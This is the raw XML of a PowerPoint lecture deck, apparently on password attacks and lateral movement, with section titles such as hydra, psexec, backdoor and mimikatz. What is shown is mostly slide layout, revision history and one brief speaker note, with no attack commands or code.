
<file path=[Content_Types].xml><?xml version="1.0" encoding="utf-8"?>
<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types">
  <Default Extension="jpeg" ContentType="image/jpeg"/>
  <Default Extension="jpg" ContentType="image/jpeg"/>
  <Default Extension="png" ContentType="image/png"/>
  <Default Extension="png&amp;ehk=LxrAl9OUgcolpdj3X5QJfw&amp;r=0&amp;pid=OfficeInsert"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notesMasterIdLst>
    <p:notesMasterId r:id="rId69"/>
  </p:notesMasterIdLst>
  <p:handoutMasterIdLst>
    <p:handoutMasterId r:id="rId70"/>
  </p:handoutMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="509" r:id="rId2"/>
    <p:sldId id="300" r:id="rId3"/>
    <p:sldId id="464" r:id="rId4"/>
    <p:sldId id="427" r:id="rId5"/>
    <p:sldId id="428" r:id="rId6"/>
    <p:sldId id="465" r:id="rId7"/>
    <p:sldId id="429" r:id="rId8"/>
    <p:sldId id="466" r:id="rId9"/>
    <p:sldId id="467" r:id="rId10"/>
    <p:sldId id="499" r:id="rId11"/>
    <p:sldId id="468" r:id="rId12"/>
    <p:sldId id="469" r:id="rId13"/>
    <p:sldId id="506" r:id="rId14"/>
    <p:sldId id="508" r:id="rId15"/>
    <p:sldId id="507" r:id="rId16"/>
    <p:sldId id="430" r:id="rId17"/>
    <p:sldId id="500" r:id="rId18"/>
    <p:sldId id="431" r:id="rId19"/>
    <p:sldId id="432" r:id="rId20"/>
    <p:sldId id="433" r:id="rId21"/>
    <p:sldId id="470" r:id="rId22"/>
    <p:sldId id="501" r:id="rId23"/>
    <p:sldId id="471" r:id="rId24"/>
    <p:sldId id="486" r:id="rId25"/>
    <p:sldId id="487" r:id="rId26"/>
    <p:sldId id="488" r:id="rId27"/>
    <p:sldId id="502" r:id="rId28"/>
    <p:sldId id="489" r:id="rId29"/>
    <p:sldId id="490" r:id="rId30"/>
    <p:sldId id="503" r:id="rId31"/>
    <p:sldId id="491" r:id="rId32"/>
    <p:sldId id="492" r:id="rId33"/>
    <p:sldId id="504" r:id="rId34"/>
    <p:sldId id="493" r:id="rId35"/>
    <p:sldId id="494" r:id="rId36"/>
    <p:sldId id="472" r:id="rId37"/>
    <p:sldId id="434" r:id="rId38"/>
    <p:sldId id="436" r:id="rId39"/>
    <p:sldId id="473" r:id="rId40"/>
    <p:sldId id="505" r:id="rId41"/>
    <p:sldId id="435" r:id="rId42"/>
    <p:sldId id="437" r:id="rId43"/>
    <p:sldId id="482" r:id="rId44"/>
    <p:sldId id="483" r:id="rId45"/>
    <p:sldId id="475" r:id="rId46"/>
    <p:sldId id="476" r:id="rId47"/>
    <p:sldId id="478" r:id="rId48"/>
    <p:sldId id="479" r:id="rId49"/>
    <p:sldId id="480" r:id="rId50"/>
    <p:sldId id="481" r:id="rId51"/>
    <p:sldId id="484" r:id="rId52"/>
    <p:sldId id="485" r:id="rId53"/>
    <p:sldId id="495" r:id="rId54"/>
    <p:sldId id="496" r:id="rId55"/>
    <p:sldId id="497" r:id="rId56"/>
    <p:sldId id="498" r:id="rId57"/>
    <p:sldId id="474" r:id="rId58"/>
    <p:sldId id="438" r:id="rId59"/>
    <p:sldId id="439" r:id="rId60"/>
    <p:sldId id="511" r:id="rId61"/>
    <p:sldId id="512" r:id="rId62"/>
    <p:sldId id="513" r:id="rId63"/>
    <p:sldId id="514" r:id="rId64"/>
    <p:sldId id="440" r:id="rId65"/>
    <p:sldId id="441" r:id="rId66"/>
    <p:sldId id="510" r:id="rId67"/>
    <p:sldId id="442"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FE6FAE8A-D281-4863-B3E4-891938200E38}">
          <p14:sldIdLst>
            <p14:sldId id="509"/>
            <p14:sldId id="300"/>
          </p14:sldIdLst>
        </p14:section>
        <p14:section name="dictionary" id="{1B535055-FFE7-461D-AB48-7EFEABA77A74}">
          <p14:sldIdLst>
            <p14:sldId id="464"/>
            <p14:sldId id="427"/>
            <p14:sldId id="428"/>
            <p14:sldId id="465"/>
            <p14:sldId id="429"/>
            <p14:sldId id="466"/>
            <p14:sldId id="467"/>
            <p14:sldId id="499"/>
            <p14:sldId id="468"/>
          </p14:sldIdLst>
        </p14:section>
        <p14:section name="hydra" id="{9256622E-B158-4F29-98AD-442418C30015}">
          <p14:sldIdLst>
            <p14:sldId id="469"/>
            <p14:sldId id="506"/>
            <p14:sldId id="508"/>
            <p14:sldId id="507"/>
            <p14:sldId id="430"/>
            <p14:sldId id="500"/>
            <p14:sldId id="431"/>
            <p14:sldId id="432"/>
            <p14:sldId id="433"/>
            <p14:sldId id="470"/>
            <p14:sldId id="501"/>
            <p14:sldId id="471"/>
          </p14:sldIdLst>
        </p14:section>
        <p14:section name="cracking" id="{737BD450-2A13-4FA5-A2B9-570C976D6B69}">
          <p14:sldIdLst>
            <p14:sldId id="486"/>
            <p14:sldId id="487"/>
            <p14:sldId id="488"/>
            <p14:sldId id="502"/>
            <p14:sldId id="489"/>
            <p14:sldId id="490"/>
            <p14:sldId id="503"/>
            <p14:sldId id="491"/>
            <p14:sldId id="492"/>
            <p14:sldId id="504"/>
            <p14:sldId id="493"/>
            <p14:sldId id="494"/>
          </p14:sldIdLst>
        </p14:section>
        <p14:section name="psexec" id="{9EE436F3-7990-49FE-BD45-4C46DC1373D4}">
          <p14:sldIdLst>
            <p14:sldId id="472"/>
            <p14:sldId id="434"/>
            <p14:sldId id="436"/>
            <p14:sldId id="473"/>
            <p14:sldId id="505"/>
            <p14:sldId id="435"/>
            <p14:sldId id="437"/>
          </p14:sldIdLst>
        </p14:section>
        <p14:section name="backdoor" id="{3A18CD79-6E58-452E-A5F3-03060DE026F1}">
          <p14:sldIdLst>
            <p14:sldId id="482"/>
            <p14:sldId id="483"/>
            <p14:sldId id="475"/>
            <p14:sldId id="476"/>
            <p14:sldId id="478"/>
            <p14:sldId id="479"/>
            <p14:sldId id="480"/>
            <p14:sldId id="481"/>
          </p14:sldIdLst>
        </p14:section>
        <p14:section name="mimikatz ophcrack" id="{6A38E577-A066-41AC-A12B-C53C23775574}">
          <p14:sldIdLst>
            <p14:sldId id="484"/>
            <p14:sldId id="485"/>
            <p14:sldId id="495"/>
            <p14:sldId id="496"/>
            <p14:sldId id="497"/>
            <p14:sldId id="498"/>
          </p14:sldIdLst>
        </p14:section>
        <p14:section name="pivot" id="{47C977D3-7937-4C3E-B0DC-66D7890E4E26}">
          <p14:sldIdLst>
            <p14:sldId id="474"/>
            <p14:sldId id="438"/>
            <p14:sldId id="439"/>
            <p14:sldId id="511"/>
            <p14:sldId id="512"/>
            <p14:sldId id="513"/>
            <p14:sldId id="514"/>
            <p14:sldId id="440"/>
            <p14:sldId id="441"/>
            <p14:sldId id="510"/>
            <p14:sldId id="4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5706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46DE1F-39CA-43BC-9EB2-63FE541068DD}" v="10" dt="2021-04-27T03:07:28.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94963" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0" snapToObjects="1">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="105" d="100"/>
          <a:sy n="105" d="100"/>
        </p:scale>
        <p:origin x="590" y="6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7" d="100"/>
          <a:sy n="67" d="100"/>
        </p:scale>
        <p:origin x="-3134"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Klabe" userId="826fd09a-dc4d-4b28-bd3e-396f39c198c4" providerId="ADAL" clId="{E346DE1F-39CA-43BC-9EB2-63FE541068DD}"/>
    <pc:docChg chg="undo custSel addSld modSld sldOrd modSection">
      <pc:chgData name="Peter Klabe" userId="826fd09a-dc4d-4b28-bd3e-396f39c198c4" providerId="ADAL" clId="{E346DE1F-39CA-43BC-9EB2-63FE541068DD}" dt="2021-04-27T03:12:34.784" v="1690" actId="20577"/>
      <pc:docMkLst>
        <pc:docMk/>
      </pc:docMkLst>
      <pc:sldChg chg="modSp mod">
        <pc:chgData name="Peter Klabe" userId="826fd09a-dc4d-4b28-bd3e-396f39c198c4" providerId="ADAL" clId="{E346DE1F-39CA-43BC-9EB2-63FE541068DD}" dt="2021-04-27T01:56:19.596" v="8" actId="1440"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="31274109" sldId="437"/>
        </pc:sldMkLst>
        <pc:picChg chg="mod ord">
          <ac:chgData name="Peter Klabe" userId="826fd09a-dc4d-4b28-bd3e-396f39c198c4" providerId="ADAL" clId="{E346DE1F-39CA-43BC-9EB2-63FE541068DD}" dt="2021-04-27T01:56:19.596" v="8" actId="1440"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="31274109" sldId="437"/>
            <ac:picMk id="4" creationId="{890A8245-CC5B-0249-A676-C72EE3BB8FA3}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp mod">
        <pc:chgData name="Peter Klabe" userId="826fd09a-dc4d-4b28-bd3e-396f39c198c4" providerId="ADAL" clId="{E346DE1F-39CA-43BC-9EB2-63FE541068DD}" dt="2021-04-27T02:48:20.233" v="203" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="980038066" sldId="438"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Peter Klabe" userId="826fd09a-dc4d-4b28-bd3e-396f39c198c4" providerId="ADAL" clId="{E346DE1F-39CA-43BC-9EB2-63FE541068DD}" dt="2021-04-27T02:48:20.233" v="203" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="980038066" sldId="438"/>
            <ac:spMk id="2" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp mod">
        <pc:chgData name="Peter Klabe" userId="826fd09a-dc4d-4b28-bd3e-396f39c198c4" providerId="ADAL" clId="{E346DE1F-39CA-43BC-9EB2-63FE541068DD}" dt="2021-04-27T02:48:55.889" v="246" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1729701303" sldId="440"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Peter Klabe" userId="826fd09a-dc4d-4b28-bd3e-396f39c198c4" providerId="ADAL" clId="{E346DE1F-39CA-43BC-9EB2-63FE541068DD}" dt="2021-04-27T02:48:55.889" v="246" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1729701303" sldId="440"/>
            <ac:spMk id="2" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="mod">
          <ac:chgData name="Peter Klabe" userId="826fd09a-dc4d-4b28-bd3e-396f39c198c4" providerId="ADAL" clId="{E346DE1F-39CA-43BC-9EB2-63FE541068DD}" dt="2021-04-27T02:48:31.559" v="204" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1729701303" sldId="440"/>
            <ac:picMk id="6" creationId="{C17026BB-7331-3545-85A4-AE6E43440957}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp new mod ord">
        <pc:chgData name="Peter Klabe" userId="826fd09a-dc4d-4b28-bd3e-396f39c198c4" providerId="ADAL" clId="{E346DE1F-39CA-43BC-9EB2-63FE541068DD}" dt="2021-04-27T02:56:45.114" v="712" actId="27636"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2543548781" sldId="511"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Peter Klabe" userId="826fd09a-dc4d-4b28-bd3e-396f39c198c4" providerId="ADAL" clId="{E346DE1F-39CA-43BC-9EB2-63FE541068DD}" dt="2021-04-27T02:47:32.596" v="66" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2543548781" sldId="511"/>
            <ac:spMk id="2" creationId="{59EE52B2-37ED-48E3-91AD-72006C6F857A}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Peter Klabe" userId="826fd09a-dc4d-4b28-bd3e-396f39c198c4" providerId="ADAL" clId="{E346DE1F-39CA-43BC-9EB2-63FE541068DD}" dt="2021-04-27T02:56:45.114" v="712" actId="27636"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2543548781" sldId="511"/>
            <ac:spMk id="3" creationId="{798EDE5A-30E5-450D-9507-8CA08BFF7542}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp new mod">
        <pc:chgData name="Peter Klabe" userId="826fd09a-dc4d-4b28-bd3e-396f39c198c4" providerId="ADAL" clId="{E346DE1F-39CA-43BC-9EB2-63FE541068DD}" dt="2021-04-27T02:58:51.113" v="862" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="105289700" sldId="512"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Peter Klabe" userId="826fd09a-dc4d-4b28-bd3e-396f39c198c4" providerId="ADAL" clId="{E346DE1F-39CA-43BC-9EB2-63FE541068DD}" dt="2021-04-27T02:51:42.738" v="496" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="105289700" sldId="512"/>
            <ac:spMk id="2" creationId="{F11C7200-30C7-4996-B1A7-D642578ED21A}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Peter Klabe" userId="826fd09a-dc4d-4b28-bd3e-396f39c198c4" providerId="ADAL" clId="{E346DE1F-39CA-43BC-9EB2-63FE541068DD}" dt="2021-04-27T02:58:51.113" v="862" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="105289700" sldId="512"/>
            <ac:spMk id="3" creationId="{58924B5D-3344-4378-8A4E-9753DC00C0B2}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del">
          <ac:chgData name="Peter Klabe" userId="826fd09a-dc4d-4b28-bd3e-396f39c198c4" providerId="ADAL" clId="{E346DE1F-39CA-43BC-9EB2-63FE541068DD}" dt="2021-04-27T02:54:26.663" v="595"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="105289700" sldId="512"/>
            <ac:spMk id="4" creationId="{8E459B6F-6FEC-4EC1-9D36-E695026E5893}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del">
          <ac:chgData name="Peter Klabe" userId="826fd09a-dc4d-4b28-bd3e-396f39c198c4" providerId="ADAL" clId="{E346DE1F-39CA-43BC-9EB2-63FE541068DD}" dt="2021-04-27T02:55:30.576" v="652"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="105289700" sldId="512"/>
            <ac:spMk id="5" creationId="{C1697DAA-6EDC-4DC1-A20A-A4EFDCF4989A}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del">
          <ac:chgData name="Peter Klabe" userId="826fd09a-dc4d-4b28-bd3e-396f39c198c4" providerId="ADAL" clId="{E346DE1F-39CA-43BC-9EB2-63FE541068DD}" dt="2021-04-27T02:57:05.467" v="736"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="105289700" sldId="512"/>
            <ac:spMk id="6" creationId="{50B45311-3C46-4843-9FFC-56A35708A577}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp new mod">
        <pc:chgData name="Peter Klabe" userId="826fd09a-dc4d-4b28-bd3e-396f39c198c4" providerId="ADAL" clId="{E346DE1F-39CA-43BC-9EB2-63FE541068DD}" dt="2021-04-27T03:10:16.693" v="1364" actId="1076"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3996846311" sldId="513"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Peter Klabe" userId="826fd09a-dc4d-4b28-bd3e-396f39c198c4" providerId="ADAL" clId="{E346DE1F-39CA-43BC-9EB2-63FE541068DD}" dt="2021-04-27T02:58:59.904" v="879" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3996846311" sldId="513"/>
            <ac:spMk id="2" creationId="{A52AC190-9200-444D-AC06-6F61D388B125}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Peter Klabe" userId="826fd09a-dc4d-4b28-bd3e-396f39c198c4" providerId="ADAL" clId="{E346DE1F-39CA-43BC-9EB2-63FE541068DD}" dt="2021-04-27T03:10:02.275" v="1361" actId="14100"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3996846311" sldId="513"/>
            <ac:spMk id="3" creationId="{6BADCA88-2378-4D71-B11F-F191C297623A}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Peter Klabe" userId="826fd09a-dc4d-4b28-bd3e-396f39c198c4" providerId="ADAL" clId="{E346DE1F-39CA-43BC-9EB2-63FE541068DD}" dt="2021-04-27T03:10:16.693" v="1364" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3996846311" sldId="513"/>
            <ac:spMk id="8" creationId="{886ECD65-FA13-497C-A65F-003593665BE7}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add mod modCrop">
          <ac:chgData name="Peter Klabe" userId="826fd09a-dc4d-4b28-bd3e-396f39c198c4" providerId="ADAL" clId="{E346DE1F-39CA-43BC-9EB2-63FE541068DD}" dt="2021-04-27T03:10:07.543" v="1363" actId="14100"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3996846311" sldId="513"/>
            <ac:picMk id="4" creationId="{B0CBE426-DA42-4FBD-9A94-B565DC294E61}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:cxnChg chg="add del mod">
          <ac:chgData name="Peter Klabe" userId="826fd09a-dc4d-4b28-bd3e-396f39c198c4" providerId="ADAL" clId="{E346DE1F-39CA-43BC-9EB2-63FE541068DD}" dt="2021-04-27T03:07:02.783" v="1312" actId="478"/>
          <ac:cxnSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3996846311" sldId="513"/>
            <ac:cxnSpMk id="6" creationId="{09BEC12B-816F-4780-A53E-DC6EE80E0932}"/>
          </ac:cxnSpMkLst>
        </pc:cxnChg>
        <pc:cxnChg chg="add mod">
          <ac:chgData name="Peter Klabe" userId="826fd09a-dc4d-4b28-bd3e-396f39c198c4" providerId="ADAL" clId="{E346DE1F-39CA-43BC-9EB2-63FE541068DD}" dt="2021-04-27T03:10:16.693" v="1364" actId="1076"/>
          <ac:cxnSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3996846311" sldId="513"/>
            <ac:cxnSpMk id="10" creationId="{C302031A-2918-4D39-B2B5-357C469A05BC}"/>
          </ac:cxnSpMkLst>
        </pc:cxnChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp new mod">
        <pc:chgData name="Peter Klabe" userId="826fd09a-dc4d-4b28-bd3e-396f39c198c4" providerId="ADAL" clId="{E346DE1F-39CA-43BC-9EB2-63FE541068DD}" dt="2021-04-27T03:12:34.784" v="1690" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="285636238" sldId="514"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Peter Klabe" userId="826fd09a-dc4d-4b28-bd3e-396f39c198c4" providerId="ADAL" clId="{E346DE1F-39CA-43BC-9EB2-63FE541068DD}" dt="2021-04-27T03:10:59.205" v="1388" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="285636238" sldId="514"/>
            <ac:spMk id="2" creationId="{525516D9-23F5-4495-B52F-0BB1D536FE8C}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Peter Klabe" userId="826fd09a-dc4d-4b28-bd3e-396f39c198c4" providerId="ADAL" clId="{E346DE1F-39CA-43BC-9EB2-63FE541068DD}" dt="2021-04-27T03:12:34.784" v="1690" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="285636238" sldId="514"/>
            <ac:spMk id="3" creationId="{ED16A47D-B3B6-4A35-BA8C-325B33558476}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add del">
          <ac:chgData name="Peter Klabe" userId="826fd09a-dc4d-4b28-bd3e-396f39c198c4" providerId="ADAL" clId="{E346DE1F-39CA-43BC-9EB2-63FE541068DD}" dt="2021-04-27T03:10:40.899" v="1365" actId="478"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="285636238" sldId="514"/>
            <ac:picMk id="5" creationId="{4D83B38C-0E73-4B12-BA93-5ED18D2CC0F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fld id="{29CED4BC-E14F-4E76-84D2-36F8E4044F81}" type="datetimeFigureOut">
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>4/26/2021</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3C938DA-85C2-4C89-A7BC-698C09AFC1BB}"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fld id="{E7328F3B-557D-4969-84A3-94972E2DF744}" type="datetimeFigureOut">
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>4/26/2021</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2C1CBC5-806E-4CCD-AAD1-C019813B1B7D}"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75045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2734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54079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11948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416397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813258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 22 is open because the I use the windows </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>vm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="110972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223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95483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84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61033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907596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4"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="15" name="Google Shape;15;p26"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="-1588"/>
            <a:ext cx="9163050" cy="5157788"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="Google Shape;16;p26"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12700" y="1041400"/>
            <a:ext cx="4205288" cy="3200400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="57068C"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>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26"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="227752" y="1532443"/>
            <a:ext cx="3637261" cy="1811289"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" anchor="ctr" anchorCtr="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="231775" marR="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buNone/>
              <a:defRPr sz="3000" b="1" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="914400" marR="0" lvl="1" indent="-317500" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="28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17500" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="28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17500" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="280"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="1400"/>
              <a:buFont typeface="Courier New"/>
              <a:buChar char="o"/>
              <a:defRPr sz="1400" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr marL="2286000" marR="0" lvl="4" indent="-317500" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="280"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="1400"/>
              <a:buFont typeface="Noto Sans Symbols"/>
              <a:buChar char="⮚"/>
              <a:defRPr sz="14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26"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="227012" y="3919554"/>
            <a:ext cx="2496453" cy="182546"/>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914400" marR="0" lvl="1"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Courier New"/>
              <a:buChar char="o"/>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pic>
        <p:nvPicPr>
          <p:cNvPr id="19" name="Google Shape;19;p26"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="257175" y="1338263"/>
            <a:ext cx="1465263" cy="228600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="27048723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390053" y="75674"/>
            <a:ext cx="6527400" cy="586477"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="0" tIns="0" rIns="0" bIns="0"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" algn="r">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:defRPr sz="2000" b="1"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Slide Number Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="15"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Text Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7031ECE0-A6F8-46C7-8A4A-67CD6EF8292B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="12" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="287381" y="921704"/>
            <a:ext cx="8572840" cy="3955095"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="0" tIns="0" rIns="0" bIns="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="457200" indent="-457200">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
